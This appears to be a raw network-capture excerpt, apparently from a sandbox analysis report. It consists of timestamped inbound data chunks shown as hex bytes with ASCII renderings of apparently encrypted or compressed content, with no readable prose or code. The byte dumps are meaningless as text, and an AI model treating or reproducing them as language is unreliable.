                                                                    2021-09-27 12:27:48 UTC57INData Raw: ec 7b d3 65 06 78 53 39 63 b7 ab f3 a7 46 8e a2 ce 0a 12 95 f1 aa af 24 c6 8c 23 f3 43 c2 c0 60 f0 73 0f 9d 1e d8 bf 91 26 1b 2a 48 5f b0 6e 24 2d cf ae 0e 3f 1b 07 87 dd 46 b5 10 69 a9 10 44 41 cd 63 c6 65 79 a4 69 90 ce f9 6e ec 38 34 4c 1e a5 05 f3 88 56 b8 04 df bd 84 94 5a 96 b6 0b 78 b1 d1 28 3d 3d eb 22 5f fa 3b 3d be a7 44 2b a6 06 e1 f3 55 97 01 57 ee 52 27 5f 77 92 50 28 5f 52 d4 2e 5c 22 7b aa a7 f8 bb 87 74 5f 81 bc 10 a8 52 72 e8 2c 8a f0 b7 44 71 16 26 19 9f 5b a2 fa 86 75 82 a2 88 19 8d 86 d3 9b 7d 45 3d e7 2a 1c d4 5d 60 43 6e 0f 0f 33 f3 76 a1 a3 b9 28 42 e2 b7 4c 1b 5d 4c f3 6d f3 fd f3 93 c3 5b 64 0f 4c 91 83 27 31 54 95 67 b5 d8 ac d7 ef d9 8c 41 b8 db fc 6a f8 94 07 0d 98 7d 76 1f 8e 0b a5 4e be 20 3e d2 1c 13 4a 11 ce 30 86 85 af bf
                                                                    Data Ascii: {exS9cF$#C`s&*H_n$-?FiDAceyin84LVZx(=="_;=D+UWR'_wP(_R.\"{t_Rr,Dq&[u}E=*]`Cn3v(BL]Lm[dL'1TgAj}vN >J0
                                                                    2021-09-27 12:27:48 UTC59INData Raw: 1c 5a 93 d2 be 82 01 3a 26 74 24 c0 c6 3c 8f 58 43 1c 5c 76 63 33 28 f6 8e 54 a0 5b 2b 04 81 96 57 39 46 d1 54 cb 9f 67 99 17 e4 87 47 10 80 dc 25 be aa 4a b0 e9 1b e8 b5 28 45 11 12 da 16 44 32 50 36 d6 2e 4a 91 97 83 48 db a1 11 aa ab 2e 0e 53 68 fe 1d c2 8e 23 05 35 b6 d9 67 42 82 65 df b0 4d 67 d0 02 e1 b1 6c fa 0e 87 7e b5 1f 36 7d 52 de d0 e0 79 ca d5 5c 7c 94 07 04 6b 0b 39 e4 41 9f 01 4f c8 ec 63 c1 87 7c 06 3a 24 58 ff 1c 4f 96 75 4e db e0 6e f7 fe e1 52 53 c3 94 ba c6 3a b0 46 db d9 a2 bd fb 43 3d f1 b2 10 b2 b8 ca 82 3d 1c df fb 4b 0a 60 70 cf f5 7a fd 08 16 02 e7 ad eb 5c 36 1d 81 ce 4b 37 62 53 f9 67 71 78 68 31 03 73 fe 72 6c 66 d6 ec fa c2 35 39 fb d8 c6 10 ec 6a 95 1e bf d0 f5 f1 86 a7 45 f5 83 a9 4f c6 e3 db 37 87 ac ee 60 26 00 d6 50 08
                                                                    Data Ascii: Z:&t$<XC\vc3(T[+W9FTgG%J(ED2P6.JH.Sh#5gBeMgl~6}Ry\|k9AOc|:$XOuNnRS:FC==K`pz\6K7bSgqxh1srlf59jEO7`&P
                                                                    2021-09-27 12:27:48 UTC60INData Raw: 10 c8 97 cc 47 18 91 06 18 a6 3b f8 6d 91 c8 fb 78 6a cf 91 c6 ae 83 a9 e3 26 5b 59 62 86 9c 98 36 cb c3 3e b8 4d e9 89 53 cb 3b 8c 20 e9 d3 94 12 53 90 1b 0b 06 9f 2f 20 3a e4 45 92 d2 72 8e 1a 6f 70 5f 75 ef 13 a1 cd 6f 27 15 e7 36 7a db 9a 9b 38 b3 ab 67 b9 ca a6 17 4b 78 8d 29 60 59 73 a1 73 71 a8 e7 68 0f 10 4d 13 44 97 8b 9b 16 8e 29 72 eb c5 58 c5 e0 6a 3a ee 6e 69 2c f9 eb 3c cb 41 af b3 cf c9 c6 48 ea d5 76 ac 8d bd 7f 3e 0c b4 40 9d af 25 24 50 52 74 f6 7e 05 5a aa af ee b4 ff 30 7b e3 21 8f ef 0b f5 94 5f 12 8a c4 f5 b2 f2 d3 64 0e ca 50 0a 5c 35 90 fd 4b 05 7b fb 3c e8 54 34 fd a0 ae 97 ba 24 31 91 75 1a 21 a0 cf 6a 3f 74 a3 49 f6 d8 89 b6 54 81 64 7b 94 64 02 65 67 29 e4 03 ba 0a 4d 5b ea ff 02 f7 c3 62 6b 60 f1 84 27 64 fd 32 a6 f4 68 08 ab
                                                                    Data Ascii: G;mxj&[Yb6>MS; S/ :Erop_uo'6z8gKx)`YssqhMD)rXj:ni,<AHv>@%$PRt~Z0{!_dP\5K{<T4$1u!j?tITd{deg)M[bk`'d2h
                                                                    2021-09-27 12:27:48 UTC61INData Raw: 44 9c 59 f4 6b d5 70 d1 89 77 3d 5c be bc 2f b9 53 ac 89 c8 0a 09 4d e6 8a bb 2d ed a3 30 f5 49 c0 cd 0a b4 72 23 91 17 e3 83 8b 35 17 f4 5b 5f 82 97 0f 01 c6 86 61 09 1b 01 8c c4 55 b3 ab 78 af 0a fe 40 e1 66 2f 68 62 b7 60 90 df ff 6b e6 c6 34 60 17 ac 14 f0 ba 5a a7 05 cd bb 84 95 5d 8b 48 1f 54 bd c0 36 34 52 0b 38 6f f4 37 4c af a1 44 46 a0 1a 0e 81 c3 92 2a 84 f9 69 0f 5d 66 92 47 a5 45 7f d8 39 53 65 93 ae a7 f4 80 a1 68 4c 8d 94 23 aa 4c 8a c1 24 97 f7 b5 44 a2 17 26 19 ab 26 8d 01 a6 71 88 8c 74 3b 8d 8c f1 97 5f 41 37 ea 1d 31 c7 5b 6a 3d 74 18 f1 34 f4 73 c5 0a bf 28 59 ce af 28 52 5d 60 fb 29 4e c4 c2 66 2f ad 74 aa 4c 91 89 1d 7f 7d 2c 6c b2 fa d9 d2 9c f1 e1 57 bf c8 f3 45 8f 91 68 bd f6 6b 7d 70 fa 20 a5 5f e1 5b 3f 4f 17 00 40 ac ac 31 97
                                                                    Data Ascii: DYkpw=\/SM-0Ir#5[_aUx@f/hb`k4`Z]HT64R8o7LDF*i]fGE9SehL#L$D&&qt;_A71[j=t4s(Y(R]`)Nf/tL},lWEhk}p _[?O@1
                                                                    2021-09-27 12:27:48 UTC63INData Raw: f1 9e 6a 36 b6 95 c3 b8 0a 38 15 3d 55 34 4b 5a 3c 90 7a 54 93 45 60 74 06 40 0e 9f 53 bb dd 1a 8c 95 82 7f 6c 56 d6 41 ff 8f ef a0 39 ff a1 61 87 0d db 25 22 ba 5e a7 df 05 62 b3 a3 d1 39 32 5b b4 55 3a d8 33 f9 f8 62 b1 1d 92 4e cf 15 2a a9 b4 02 0f 42 7e f9 02 e8 8b b7 05 3a bf 8b 14 de 93 66 62 8c 65 f3 c4 2a 28 2c 7d f7 00 af 4a 62 34 32 7d c8 d8 5a f8 56 dc 48 5e 73 9a 3f 32 fc 87 b5 e4 dd 8f a4 41 f1 ee eb f8 49 62 34 10 ca 5e eb 34 ff 83 72 57 fe 7b f5 e6 f9 ff 72 67 57 bc 19 c6 a6 ab 35 49 ec 82 3c e8 46 2c 68 aa 01 a4 00 5d 6d 11 1d df 6d 56 25 e8 47 d9 63 63 95 01 2f 1d b8 22 fe 4a 2d 0c 02 a0 d7 2c 6e 92 d2 5d 38 d3 79 36 16 5b e6 04 fb 5f e9 f3 c6 d7 87 a5 ed f5 d9 2d f2 1f 09 0f b8 cf de ee 78 c8 54 e3 86 96 50 b3 64 fa 33 98 e5 f0 0f ba 67
                                                                    Data Ascii: j68=U4KZ<zTE`t@SlVA9a%"^b92[U:3bN*B~:fbe*(,}Jb42}ZVH^s?2AIb4^4rW{rgW5I<F,h]mmV%Gcc/"J-,n]8y6[_-xTPd3g
                                                                    2021-09-27 12:27:48 UTC64INData Raw: 84 19 79 5d d2 96 ca 5e cc de f8 2f a4 3b ff 6d 82 c8 e8 46 15 96 95 c0 c7 09 ba f9 37 62 0c 77 81 f5 1e 25 d1 dd 07 ec 58 ec a7 f3 db 21 93 67 91 d5 94 12 e0 88 29 5b 0b b7 07 4d 10 e0 56 93 c4 6a 94 60 61 62 4b 54 00 17 91 f4 4c bd 06 e0 34 75 b9 2d f4 8a b8 a7 45 ad d3 b7 18 84 77 e5 b1 69 73 79 d5 61 30 b4 fc 7b 03 01 41 3b af 97 8b 9d 13 88 38 66 d4 12 4b d1 e4 7e 2b fb fa de 1e 3f e9 09 e7 1b 9f b2 c9 a6 f5 49 ea ce 48 ae 86 85 e7 2d 04 a5 48 e3 d7 3c da 5b ae 6f f4 11 cd 72 be a5 f4 e3 da 0d 61 f0 23 8c c7 86 fe 8e ab 7c 82 85 d5 b4 ce 69 64 83 e1 41 0c 49 17 02 f3 5d 0e 54 d8 3b e8 54 23 fd b1 a9 92 a5 37 30 d6 85 1b 21 a0 7e 73 20 70 62 55 c9 88 99 a1 df bf 6c 14 7e 76 1a 7e 6c 35 e2 95 bd 3d 5a d0 c4 fd 08 e0 f1 6f e8 47 fa 84 3b 65 99 1b 9b f7
                                                                    Data Ascii: y]^/;mF7bw%X!g)[MVj`abKTL4u-Ewisya0{A;8fK~+?IH-H<[ora#|idAI]T;T#70!~s pbUl~v~l5=ZoG;e
                                                                    2021-09-27 12:27:48 UTC65INData Raw: 6a 83 92 6f 9c 59 f5 69 dd 79 cb 7a 60 02 47 9f 85 fb b4 4a b5 95 d8 19 0c 38 d3 76 ba 07 fd ab 32 e2 5d f9 a0 17 4a 75 16 1a 12 f0 87 90 35 33 e5 68 4f 8b 67 26 3c cf ae 45 a9 0a 25 90 cb ca 8a ab 69 a8 b2 11 63 d5 72 2b 4d 68 a4 66 9a 6c e8 56 ff 1b 24 6f 0a b1 1c 78 a7 56 b8 0f cd 99 95 a0 4d 81 2a 0f 5c a6 c7 ae 2c 19 f2 2e f3 ef 1f 45 94 00 44 57 ac 20 e1 a4 f9 07 2d 56 f5 59 1f c7 5f 85 5c 5b 4e 40 da 39 73 12 ca 82 ac ef b0 bc ee 77 9a 94 32 a6 41 66 d1 19 9e d8 3e 6e 40 10 30 9e b4 47 a5 d3 b3 65 96 b3 88 9d 8d 86 d3 95 4e 50 29 c9 6e 3c d4 5b 7c a1 75 0e 0f 34 cc 64 c6 0e 91 8f 48 c8 ba 05 bd 52 5b 74 05 4b fc f2 8a f3 43 7f fb 5b 1d bc 35 38 7d 8e 77 96 c6 97 63 9c fb 84 61 6e c8 f9 6d 65 af 68 b7 98 6b 54 81 f1 0a af 68 d4 49 2c c6 3d 03 57 3a
                                                                    Data Ascii: joYiyz`GJ8v2]Ju53hOg&<E%icr+MhflV$oxVM*\,.EDW -VY_\[N@9sw2Af>n@0GeNP)n<[|u4dHR[tKC[58}wcanmehkThI,=W:
                                                                    2021-09-27 12:27:48 UTC66INData Raw: 7c 31 1d c8 24 24 68 8d e2 6f 48 5e 67 19 59 64 f9 60 08 57 ef ec f0 f1 2f 39 fc f2 d7 06 f2 73 43 0d a7 c1 f4 e7 6b 05 54 f2 81 7f 5c df d3 a2 25 97 b6 c8 71 01 67 f1 3f 3a 80 7d 53 0e 4a 8b d4 f3 7a d3 6e cb 55 67 33 42 a6 b3 75 8b 4c a6 9b 6c 1b 3a 5f d9 c4 ba 01 e4 93 79 f3 49 db e3 f9 4b 73 05 bf c1 f1 87 9b 0e 35 f4 4a 53 f5 4d 0c 2d c9 bf 57 1c cd 14 9f cc 48 a2 26 6e a9 10 01 52 eb 72 1f 73 68 bc ea af ce f9 75 4e 29 13 58 36 15 05 f5 82 49 98 82 e1 bd 84 85 4d be 1d 1e 78 bb fd 1d 2c 33 fd b4 68 fe 3b 53 af 84 55 74 b0 17 e8 0c d0 97 01 5c 46 6b 2a 49 5f 24 5c 5b 4e 4c ab a4 68 0a 5a af b1 d6 61 a5 74 55 b1 c8 cd 53 ad 63 d3 05 9b e8 ae 7a 78 b4 27 13 b3 56 a8 eb 3c 70 82 a4 b1 29 b4 12 d8 b3 5f 50 32 c9 95 3b d4 5b 05 35 73 0e 05 18 c9 61 dd 31
                                                                    Data Ascii: |1$$hoH^gYd`W/9sCkT\%qg?:}SJznUg3BuLl:_yIKs5JSM-WH&nRrshuN)X6IMx,3h;SUt\Fk*I_$\[NLhZatUSczx'V<p)_P2;[5sa1
                                                                    2021-09-27 12:27:48 UTC67INData Raw: 22 ee ad ab 8b 9b 1e 38 fe 9e c5 21 ac f6 62 77 7f 75 44 de 9c 8d b6 54 90 6c 14 6f 67 02 6f 62 21 f5 09 a3 25 72 73 de fd 02 f0 f2 49 7b 6b dd 95 2c 73 19 33 8a e6 72 18 88 c8 4e e0 d2 f3 96 9c 8c 42 92 c7 90 e2 29 12 28 62 b8 dd 95 29 a7 6f 42 0f 5e 4f 45 27 56 94 84 7c 9c f9 3a 06 4b 82 79 da 46 c1 5e da 99 73 b1 3e f8 9f 41 15 17 db 25 bf b8 69 ba f8 3a fe a2 a4 cb 11 12 ca a2 5e 11 5f 22 f9 f0 b5 90 b1 90 56 c4 89 3c b8 55 29 35 dc 78 f5 1d c4 85 d5 15 11 a2 8c 00 69 61 63 7e ce d8 73 c4 20 02 b0 6c f0 04 b1 6f 9d 8c 33 7d 54 44 5d e7 68 e2 fa 4d 74 83 04 61 c6 87 b5 ee 4b 81 b9 76 7b f8 77 e3 5d 78 2e 1e 37 5e ed 38 4b bc 77 48 cb 7e 6d e6 fb c8 32 43 d7 ba 31 e2 3a ba 38 7e e8 a2 bc e2 6a 3c e5 be 2e cf 32 7d eb 39 39 df f1 4d 31 f2 5b c9 8c c8 92
                                                                    Data Ascii: "8!bwuDTlogob!%rsI{k,s3rNB)(b)oB^OE'V|:KyF^s>A%i:^_"V<U)5xiac~s lo3}TD]hMtaKv{w]x.7^8KwH~m2C1:8~j<.2}99M1[
                                                                    2021-09-27 12:27:48 UTC68INData Raw: b0 23 bd 2f 2d f8 02 41 f1 fa f6 25 53 5c e7 5e 97 81 1d 5e 7d 2c 6c a6 d7 ae d5 8d fe 98 50 bb 46 4e 02 1f 91 68 bd 92 7a 6b aa e7 dc 28 1b d1 5f 3e de 07 06 51 2c ba 20 83 0b 0a bd f4 eb ee 0b 7f da b0 c4 3e 3e c5 75 30 b7 3f ef 7a 92 07 e3 75 15 fa 91 c0 cb b8 ac f7 2a 62 68 73 81 f9 62 34 cd ef 2f b1 5c ed b1 51 ca 3b 8a 4f cf 9f da 14 53 83 33 48 03 8c 19 4d 10 d4 45 94 d5 f2 87 75 66 67 54 54 2a 06 83 f2 a6 26 39 ef 3d 7b a8 27 8d c6 b8 8b 4d 96 c1 a6 1a 8d 84 8b 2f 6a 58 71 8a 90 18 23 e7 68 05 12 65 75 57 97 81 f4 16 8e 29 78 e9 c4 58 de c5 69 3a 28 75 69 2c 6a f8 0c de 32 21 b2 cf c3 4d 60 c4 c6 60 b9 95 81 c5 10 0e b4 46 80 d7 26 db 51 78 71 dc 30 c8 5a ac 8d d7 e9 e9 14 58 82 36 84 e9 32 da 8e a1 19 8e b6 d5 b2 fc ff 78 84 c9 71 0e 5d 39 ae d2
                                                                    Data Ascii: #/-A%S\^^},lPFNhzk(_>Q, >>u0?zu*bhsb4/\Q;OS3HMEufgTT*&9={'M/jXq#heuW)xXi:(ui,j2!M``F&Qxq0ZX62xq]9
                                                                    2021-09-27 12:27:48 UTC70INData Raw: b8 9c b1 33 35 17 a1 b6 3c 69 87 fe 4a 36 b1 69 31 03 77 23 75 75 5d ea d4 dd c9 eb 39 82 0d c7 10 e7 72 84 1a d0 d0 e2 f1 52 2f 44 e6 99 a3 20 77 f9 eb 3e 94 a2 fe 67 0b 54 a8 6c 19 82 77 5d 0e 40 f3 59 f6 7a d9 14 d9 75 76 1b 3b 07 aa f9 be 5f a1 8b c9 27 1d 73 13 74 ba 01 f8 36 08 f3 49 d0 d8 16 5b 74 07 86 11 9f 87 93 26 1b 8f 48 5b 9a 63 61 9f ce ae 45 23 0a 07 87 d7 55 b3 ba 6f 84 15 dd f7 cd 63 39 74 7f cb 15 91 ce f3 a4 f9 38 35 4d 36 b1 05 f5 82 65 a8 1f d8 95 18 84 5b 9c 9e 17 79 b1 d7 21 38 16 e3 28 69 8a 29 52 bc bc 57 52 b7 03 d8 88 ee 97 07 4e ec 6b 01 75 eb 94 5c 51 6c dc d5 28 5d 27 3f dd 85 fc 93 a2 67 56 9a 9d 3a bd 56 1b c0 0a 8a fa c6 6f 42 16 2c 7c 99 45 a5 d4 b6 78 93 ac b4 12 07 82 d9 b5 49 cc 3a e1 02 39 c0 49 7e 04 d1 0e 0f 3f f0
                                                                    Data Ascii: 35<iJ6i1w#uu]9rR/D w>gTlw]@Yzuv;_'st6I[t&H[caE#Uoc9t85M6e[y!8(i)RWRNku\Ql(]'?gV:VoB,|ExI:9I~?
                                                                    2021-09-27 12:27:48 UTC71INData Raw: 3a 79 4c 7d f5 c5 d8 8d a2 20 a9 e4 cb 02 43 ca d5 73 30 f2 6b 1b c9 fe ed bf 43 96 fd 0b 6f 3a 15 0c 14 2a e4 0f 3d 3a 52 2c dd 9e 62 f8 f8 7f e9 74 b1 ca 37 10 63 3a 9b f1 e1 3b 20 bc 4e e0 87 eb e2 2a a2 d5 8a d3 ab 9e 29 03 2a 68 dc d6 67 33 9e 5f 5b 13 c8 7a 78 2d 56 83 86 4b ad 07 3b 20 9f 93 78 ec 58 89 c2 c5 93 60 b9 3e f1 8f 56 f9 0c f7 26 a6 b8 51 b8 e9 1b e1 b2 5a cf 3d 18 ca b2 42 ec 57 24 e1 f6 58 99 9d 83 46 d1 77 3a 82 a1 39 1e c5 70 b0 81 dc 94 38 1c 3d b1 af 1d 50 7c 60 51 a6 54 77 c9 35 3b a3 64 f0 0e 89 71 63 35 1e 74 45 ce 45 f8 12 56 c8 5c 7c 85 1e 1a 63 89 4b e5 6d 99 b5 4d c6 e7 78 fa 46 7d 17 38 2a 55 15 35 4f 95 64 4f c0 72 65 e4 f6 e0 57 4f c8 b6 e7 c7 16 b3 23 51 c4 bf 20 f7 4d 3f fc bb 17 b3 2e 83 ec 3d 16 c1 7c 6c 22 f7 71 dc
                                                                    Data Ascii: :yL} Cs0kCo:*=:R,bt7c:; N*)*hg3_[zx-VK; xX`>V&QZ=BW$XFw:9p8=P|`QTw5;dqc5tEEV\|cKmMxF}8*U5OdOreWO#Q M?.=|l"q
                                                                    2021-09-27 12:27:48 UTC72INData Raw: 22 5b c3 a1 2b b8 74 d4 fd 02 4d ea 7e 9e d0 52 5d f9 59 85 ab 96 38 7c 26 72 9d 04 bc d3 9a ed 03 46 be c8 f8 79 fd 84 40 14 99 7d 76 58 6c 0a a5 4e f9 c6 3b d2 10 28 4f 28 ac 37 95 8f ac be ca 0b 18 0a 75 fd a9 dd 47 ee 4b 74 3a ae 16 c8 0d ba db f2 56 2e c1 80 cc e9 3c af e3 26 25 7a 71 81 f5 ad 38 da ce 40 95 5e ec a7 40 c6 2a 80 20 e9 d3 94 12 53 95 22 41 6d b7 2b 4f 16 e0 54 98 ba 7b 86 75 7d af 50 5a 19 31 84 e5 52 34 18 c5 1d 70 a8 2a 45 38 a8 a2 58 57 d9 a3 0c 90 6b 85 3d c3 8d 8c 5e ad 21 91 cf 5f 0f 10 47 00 58 91 86 b3 38 8f 29 78 1d c6 5e ef fc 40 3a ee 35 5d 2c f8 f8 0c cf 41 11 b2 cf c9 70 49 ea c4 a1 be 86 85 e2 3e 0c b4 5a 8c a4 3c da 51 7e 7a bf 11 cc 5a 3c a4 f4 e9 08 1f 70 fa 23 84 ef 1a e4 8e a1 12 bd b7 d2 b2 54 d3 64 83 7b 50 0a 4c
                                                                    Data Ascii: "[+tM~R]Y8|&rFy@}vXlN;(O(7uGKt:V.<&%zq8@^@* S"Am+OT{u}PZ1R4p*E8XWk=^!_GX8)x^@:5],ApI>Z<Q~zZ<p#Td{PL
                                                                    2021-09-27 12:27:48 UTC73INData Raw: e3 02 ed be 73 5c 3c 2a 10 d1 20 a1 78 83 f7 4c 46 03 f4 20 07 7f f6 46 8c 4e ee ec 66 d9 e5 2a f9 f5 b5 9d ec 7a 93 0d bb 0e f4 d4 70 63 45 e4 93 ba 49 c1 f4 c3 0c 87 a5 e5 bd e1 76 d6 50 08 86 55 01 1b 44 9a 36 73 7b d3 69 ce 89 77 00 50 d8 23 f8 b4 4a b0 64 cc 1c e6 4a 91 58 b8 07 c4 ad 32 f7 26 59 ca 13 4c 64 d5 84 1a e3 8e a9 ae 11 f4 4a 48 9e 78 07 05 52 aa 4f 0d 74 8d 86 dd 40 a6 a3 78 ad 01 09 69 3b 60 39 63 16 2e 67 90 c8 ea 79 fd 3c 24 45 36 3b 01 f5 8e 39 32 0f de bb 97 83 28 9e b4 1e 7e a2 dd 1a aa 3d ea 33 7e f2 2a 55 94 c1 45 57 ac 0f e1 85 80 9d 03 5d e2 15 1f 5c 77 9e 4f 51 37 71 d6 28 51 19 51 bf ac d6 0c a0 74 59 e4 be 30 ac 54 65 cb 19 87 9f 99 6e 40 10 37 18 a2 4d ca f4 a5 71 84 b5 ab 2b 85 e9 f1 b1 5f 47 2c e8 15 ee c7 54 7b 25 63 01
                                                                    Data Ascii: s\<* xLF FNf*zpcEIvPUD6s{iwP#JdJX2&YLdJHxROt@xi;`9c.gy<$E6;92(~=3~*UEW]\wOQ7q(QQtY0Ten@7Mq+_G,T{%c
                                                                    2021-09-27 12:27:48 UTC75INData Raw: 1c 57 42 b1 c7 54 22 ef b4 a9 95 a2 30 2f 62 85 0a 36 82 7b 62 36 69 53 55 cf 8a 1d 9a 4d 81 7c 02 e5 4d 13 6f 74 29 25 1c ac 25 73 5b d0 fd 02 fb c1 4d 79 6b fb e1 39 73 03 32 99 f2 61 1c b4 94 eb e4 d8 f0 96 c7 11 49 95 c2 ab 86 38 02 34 5c 84 d3 4b 3d 2d 49 52 1b 40 73 43 86 56 92 84 40 8c 5e 3e 0c 93 94 f2 f7 47 d1 5f ce 8d 67 99 9d e0 87 4b 2f 91 db 25 b4 b8 50 a9 ff 07 d6 07 a0 ce 17 05 56 b3 55 3a 45 31 ee f6 5b 87 b5 3a 4a cf 8f 99 bf bb 3c 0d ca 47 5d 1d c3 97 3f 3c 9a a4 a7 04 54 0f 66 7d a1 44 67 d0 3e 00 13 6c f0 15 a9 f6 9d 34 38 6e 5c d8 54 cb 20 db dd 67 fb 84 0f 18 51 d7 a4 ec 6d d2 b2 56 e8 77 76 e9 44 50 45 43 17 5c eb 32 70 98 64 42 dc 64 41 e0 ff e0 40 28 f3 be 19 c0 2b b0 23 5e f1 b5 bd e8 40 43 d2 b9 06 bd 27 77 c5 b0 19 df f7 28 08
                                                                    Data Ascii: WBT"0/b6{b6iSUM|Mot)%%s[Myk9s2aI84\K=-IR@sCV@^>G_gK/%PVU:E1[:J<G]?<Tf}Dg>l48n\T gQmVwvDPEC\2pdBdA@(+#^@C'w(
                                                                    2021-09-27 12:27:48 UTC76INData Raw: d7 19 bf 47 30 c8 b0 29 52 57 4e f9 19 46 fc fa 86 df ac 5d c1 45 a9 8d 37 38 7c 33 76 b8 d2 b6 cc 91 05 8f 6d ab cc d1 55 ec 90 6e a1 b1 53 7c 70 fa 1c e5 5c d0 5f 3f cd 18 0d 40 20 b3 3d 78 84 91 bd da 65 18 0a 7f cf 9b c1 4d cf db 6d c4 a5 17 f6 46 49 d8 f2 50 22 d4 9c c0 c8 b4 b7 1d 21 66 45 77 a9 cf b9 34 cd d3 07 9f 5c ec ab 47 8a 8f 8b 4f cf ce 89 19 42 90 2e b6 03 b3 2e 77 90 e6 45 94 cb 6e 87 7c 68 68 a1 7e 1d 14 80 cd 63 22 15 eb 33 58 86 20 9b 32 af 94 89 9e d0 ab 1d 9c 65 91 fd 69 5f 7b 99 0f 31 b4 e7 77 13 1d 4d 1a 49 9e 75 9a 2c 96 f9 2e c3 c4 59 ed e1 6a 3a e4 1b 74 2e f8 f2 08 a0 5f 99 b2 c5 c5 58 42 e7 c4 69 a0 91 7b ec 12 02 64 5e 8c a4 3f f2 45 7e 7a fe 1d d3 42 a7 a5 fd f0 17 1f 5c f4 31 f7 e7 18 fe 84 ce 1a a4 87 df b9 ec de 64 8a fe
                                                                    Data Ascii: G0)RWNF]E78|3vmUnS|p\_?@ =xeMmFIP"!fEw4\GOB..wEn|hh~c"3X 2ei_{1wMIu,.Yj:t._XBi{d^?E~zB\1d
                                                                    2021-09-27 12:27:48 UTC77INData Raw: 73 be 1c 00 09 ed b9 f7 b3 33 19 1f e5 49 16 8a 8f 93 2e 59 4f 6c 1b 2b 62 fa 1b 0b 4e ee e8 d0 c8 eb 39 ef c2 c4 10 c5 7a 95 1e 2e d0 e0 e0 4e 5f 6e ff 99 ae 58 39 f9 c7 36 9f ae ef 67 30 88 d7 7c 1b 95 76 55 18 5c 62 58 d8 78 f8 6d f3 94 74 6a 39 b7 ab fd 9e 7a a4 99 e6 1b 18 4b fb 09 d7 01 ee bf 09 f3 49 c2 fb 11 4a 5b 0f 97 15 56 87 91 37 07 ff 61 42 9a 6e 19 d3 ce 82 4d 13 10 07 80 cb b8 b4 87 6b be 1b 00 46 d5 9d 38 49 7b 8f 64 bb 2d fb 0f 82 38 35 48 34 87 07 f6 f5 38 b8 0e da 97 82 ae 5b 85 86 1a 78 33 d1 32 3d 3d ea 39 6f fc 13 45 bc a7 4e 54 8b 0d d8 be ea 97 07 2e c2 78 09 57 0d 96 5f 73 de 57 d4 2e 87 1f 5a ae a6 d6 87 a4 74 55 e4 b3 30 ac 58 5c 5c 08 8a fa d2 73 41 16 20 11 c0 16 a4 d2 a1 1e a9 a5 a0 3c 8f e9 f3 b2 5f 47 3e c9 3d 3d d4 5b 05
                                                                    Data Ascii: s3I.YOl+bN9z.N_nX96g0|vU\bXxmtj9zKIJ[V7aBnMkF8I{d-85H48[x32==9oENT.xW_sW.ZtU0X\\sA <_G>==[
                                                                    2021-09-27 12:27:48 UTC79INData Raw: 86 f6 4b f6 42 79 3e ff 5f 22 e9 bf 46 85 9f 24 13 fc bf f8 23 d1 a0 62 36 67 5f 66 dc 9f f0 ca 52 90 68 3e 7f 65 02 7c 44 21 f5 21 ac 25 72 7b c4 fd 13 e7 e2 52 63 6b f6 82 d2 72 2f 31 92 fc 70 1c b6 42 4f cc da e1 8a 4a 11 51 6b c2 94 94 02 10 09 97 20 ac 36 3b 8f 5c 68 2d 56 64 16 58 56 92 8a 7e a4 f9 3a 1f a5 80 7f d8 47 d1 5e d2 99 73 a0 28 eb ac 5a 07 0a cc db bf 87 5b a0 f3 13 f9 b4 5a cf 3d 10 cc bf 55 3d 5c dc ff cb 49 ba 9f b9 ad cd f2 45 ae ab 2c 33 fc 6d fd 60 bd 9d 2b 10 17 9a a5 2a 55 82 61 77 a3 52 0e 47 2a 28 b4 46 e3 2f 83 6a b5 34 32 7d 5c c9 5d f6 6f c1 ff 54 74 82 18 ec 7d ab b7 fc 4a 9e a4 48 3e f9 5b eb 59 76 06 37 2d a0 ea 18 61 b9 77 63 2e 6f 12 88 fe e0 42 6d f5 be 1a bb 45 ba 32 52 f3 a2 bc e8 55 1c f6 bb 2e bb 36 7d e5 11 1d ce
                                                                    Data Ascii: KBy>_"F$#b6g_fRh>e|D!!%r{Rckr/1pBOJQk 6;\h-VdXV~:G^s(Z[Z=U=\IE,3m`+*UawRG*(F/j42}\]oTt}JH>[Yv7-awc.oBmE2RU.6}
                                                                    2021-09-27 12:27:48 UTC80INData Raw: 2a f7 50 59 19 b9 28 d4 ce af 13 b3 15 d0 ff 1d 7a ea 6f 9f cf 60 7c 31 4d 91 83 a9 3e 63 1f 79 ba 4e b9 cc a8 e4 be dd b8 d7 cc 4d 49 90 68 b7 05 7b 63 46 d0 94 a5 44 d1 c3 39 cd 21 20 bd 29 ac 31 1a 83 a2 8d fd 8d 85 0c 60 e9 b6 49 4d c6 c4 e9 3c bb 01 de 8f 98 d9 f2 cc 3b d2 aa e0 09 ab ab e3 bc 4c 4f 4f a1 59 bc 34 cb 59 29 ae 61 f3 d4 cd cc 24 b4 6f 0e d1 94 14 de 9f 2c 77 1c 03 2f 50 50 fd d9 92 ca 22 98 0c eb 77 40 3d 26 9a 82 fa 1b 07 f7 ed 25 70 34 26 84 7c 99 30 4f 81 ca 3a 1b 8a 3f aa db 68 73 73 3d 75 2f f2 c7 c7 0f 10 4d 8f 50 88 cc bb 80 8f 29 72 5f c2 47 8d ea 52 a6 e8 6b 20 33 98 64 0a d0 0b 84 b9 53 cf 58 03 f5 b5 fc b9 99 c9 f2 30 90 b2 5f c1 bb 55 46 57 61 34 eb 42 50 5c b5 ea eb 9e 75 18 6f aa 2d ab 73 1c e1 df be 1c 3a 81 ca e0 e9 b2
                                                                    Data Ascii: *PY(zo`|1M>cyNMIh{cFD9! )1`IM<;LOOY4Y)a$o,w/PP"w@=&%p4&|0O:?hss=u/MP)r_GRk 3dSX0_UFWa4BP\uo-s:
                                                                    2021-09-27 12:27:48 UTC81INData Raw: 6a c8 71 c5 88 c4 78 10 ec be e5 67 32 35 1d dd 7b 38 69 78 e8 42 59 e3 68 31 18 76 f4 4d 24 4e e7 fb 04 c9 c7 3b e4 ff c6 19 f7 84 94 32 bb c6 ca ea 55 54 4c fd 67 a8 63 cd fa c3 05 87 a5 e5 4d 04 6c db 50 10 9a 83 54 33 41 98 4d a5 63 de 6f d1 61 88 10 78 b5 bc f4 b4 45 bd 64 cf 26 1a 60 f3 5f 01 72 c7 b9 23 f9 42 d6 a4 39 48 73 05 95 7a db 85 91 2c 16 9b 60 5b 9a 63 26 96 cb ae 49 23 f3 06 87 d7 42 e5 a7 7b ab 38 5d 41 cd 69 11 d9 7d a4 60 b8 ea f9 74 e6 10 45 4d 1e a3 01 fd a0 ca b8 0e d4 ec ac 1f 5b 96 bc 36 bc b3 d1 34 15 0e eb 39 65 d6 17 50 bc ad 47 7f 62 04 f0 86 c7 b0 01 5d ee 15 24 5f 77 9e 5b 34 6e 51 d4 22 40 65 74 ac 